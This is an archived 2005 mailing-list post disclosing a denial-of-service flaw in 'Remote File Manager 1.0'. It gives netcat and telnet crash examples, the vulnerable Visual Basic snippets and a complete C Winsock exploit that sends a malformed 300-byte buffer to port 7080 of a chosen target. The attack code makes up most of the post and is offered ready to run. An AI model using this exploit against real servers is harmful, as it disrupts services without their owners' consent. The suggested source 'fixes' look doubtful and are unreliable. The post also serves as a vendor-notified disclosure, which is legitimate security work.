| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050508152604.C1D6E23D02@ws5-3.us4.outblaze.com>
Date: Sun May 8 18:16:01 2005
From: basher13 at linuxmail.org (eric basher)
Subject: Server Remote File Manager DOS Exploit
Update:
8:13 PM 5/7/2005
Subject:
" Server Remote File Manager DOS Exploit "
Vulnerable version:
Remote File Manager 1.0
Description:
Remote File Manager has function for client/server program ,allows user to
remotely manage files on another computer via Winsock.
It includes: upload file, download file, delete file, remove directory,
get file information, and execute file.
Vulnerability:
A denial of service or buffer overflow condition occurs when a
text string is sent to the service data application.When is server
file manager connected/listening for incoming data from client,
sure is client not connected to server,we can send a text string
into server application that cause the program is disconnected/restarted.
Try use telnet then connect to specified IP and Port (ussualy port 7080),
sample;
telnet localhost 7080
Connected..
<text> 'send text,this could server has recive type unformatted string,
that server need to close.
Take a look on mudules ModSession.bas;
dRet = Format(Bytes / 1024, "####################.##")
The source debug code will show,like;
Run-time error '13':
Type mismatch
This cause the size chunk has string '#'its not a empty field or
has no number
Other else we can use netcat to sending information file that can
cause server FileServer to crash,sample;
X:\>nc -vv localhost 7080
DNS fwd/rev mismatch: infamous-group != localhost
infamous-group [127.0.0.1] 7080 (?) open
FIN"/files
The source debug code will show,like;
Run-time error '9':
Subscript out of range
Take a look on ParseGetFileInfo ModSession.bas;
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)
"FIN" this comand to get file information: "FIN"/File path
,if file is exists,the handle for script will cause out of range
this could the program need to be restarted.
Exploit:
/*
Server Remote File Manager DoS Exploit
-------------------------------------------
INFGP - Hacking&security Research
[+] Attacking localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost : Disconected!
Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300
int main (int argc, char *argv[]){
char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";
unsigned int rc,addr,inetsock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];
memset(buffer,'A',300);
memcpy(buffer,req,25);
if(argc < 2) {
printf("\n\n Server Remote File Manager DoS Exploit \n", argv[0]);
printf(" -----------------------------------------\n", argv[0]);
printf(" INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target]\n", argv[0]);
printf("[?]Exam: %s localhost \n", argv[0]);
exit(-1) ;
}
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!inetsock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
tcp.sin_port=htons(7080);
printf("\n[+] Attacking %s..\n" , argv[1]) ;
printf("[+] Build DOS string\n");
Sleep(1000);
printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] Sending bad format..\n") ;
send(inetsock , buffer , sizeof(buffer) , 0);
printf("[+] %s : Disconected! \n\n" , argv[1]) ;
}
else {
printf("[-] Port :7080 is invalid.Server not connected!\n");
}
}
Solution:
vendor was notified.
Other advice at mudules ModSession.bas,delete string '#' ;
dRet = Format(Bytes / 1024, "####################.##") ' Vulnerbale string
'#'delete this string to empty field ('dRet = Format(Bytes / 1024, "")')
Take a look on ParseGetFileInfo ModSession.bas;
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)
Changes sBuff to 0 ,sample;
If Not objFSO.FileExists(sBuff(1))'Make 1 changes to 0 'sBuff(0))
This make a server File Server keep a going working as well.
Vendor URL:
http://www.niteenterprises.com/
Security Audit Tools:
http://user.7host/stardawn/files/Srfmdos.zip
Credits:
Published by - basher13[basher13@...uxmail.org]
--
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
Powered by blists - more mailing lists